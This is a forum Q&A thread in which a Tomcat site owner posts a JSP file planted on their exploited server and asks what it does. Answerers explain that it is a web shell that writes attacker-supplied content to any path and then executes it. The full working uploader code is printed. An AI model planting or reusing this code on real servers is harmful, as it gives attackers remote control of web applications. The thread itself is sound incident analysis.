# what is this code doing

Tags: java, jsp, web

I have a web application which has been recently exploited. The server is tomcat 7.0.42 . I have found files on server which I havent upload. Do you know why are they appearing? Here I show you the contents of one of these files, can anybody tell me what is it trying to do?

```
<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.OutputStream"/>
<jsp:directive.page import="java.io.FileOutputStream"/>

<% int i=0; String method=request.getParameter("act"); if(method!=null && method.equals("yoco")) {
    String url=request.getParameter("url");
    String text=request.getParameter("smart");
    File f=new File(url);
    if(f.exists()) {
        f.delete();
    }
    try{
        OutputStream o=new FileOutputStream(f);
        o.write(text.getBytes());
        o.close();
    } catch (Exception e) {
        i++;
    %>0<%
    }
}
if(i==0){
    %>1<%
}%>
<form action='?act=yoco' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url">
<br>
<textarea rows="20" cols="80" name="smart">
```

Comment: I think is writing a file from what is in the <textarea>. Basically who sent this can write any .jsp file and execute on your server. It's a form of "attack", you should remove it and check your passwords/security of your server.

Comment: Looks like a trojan which attempts to replace some jsp with content sent as "smart" parameter and the execute it...

Answer (score 2):

This looks like a rootkit providing remote control for attackers.
They are making a form post to the same JSP servlet. When the post request is received parameter values sent to it via the POST request is held and processed;

```
String url=request.getParameter("url");
String text=request.getParameter("smart");
```

Notice the value received via parameter `url` is held in a variable `url`. They then check to make sure the parameter value, does exist as a file before deleting it - using;

```
File f=new File(url);
if(f.exists()) {
   f.delete();
}
```

Finally the second parameter `smart` is held in parameter `text`. This is then used as the content of a new file created using parameter `url` as the file path.

```
 OutputStream o=new FileOutputStream(f);
 o.write(text.getBytes());
 o.close();
```

Answer (score 2):

This code takes a parameter called `url` and a parameter called `text`, takes the contents of `text` and writes it out to a file on the web server as defined by `url`.

Essentially, a client can upload arbitrary text to a file anywhere that is writable on the web / application server.

Sounds exactly like that happened.

Comment: Could I upload my application and then remove write permissions to that folder so nobody can write a new file?

Comment: Sure, but what about other files and directories?  Temp directories are always writable.  This is not the sort of code you "lock down" or try to squish into a sandbox.  I suggest you find a better way.

Answer (score 2):

This is method to write new files into your server.

This small .jsp process a GET request, if there is a 'yoco' and a 'url', it tries removes the file at the url, then it tries to write the content of the  onto the file at the url parameter.

After the file is written, the file can be run typing down it's location.

Also it output 1 if it was successful, 0 if failed at the attempt to write the file.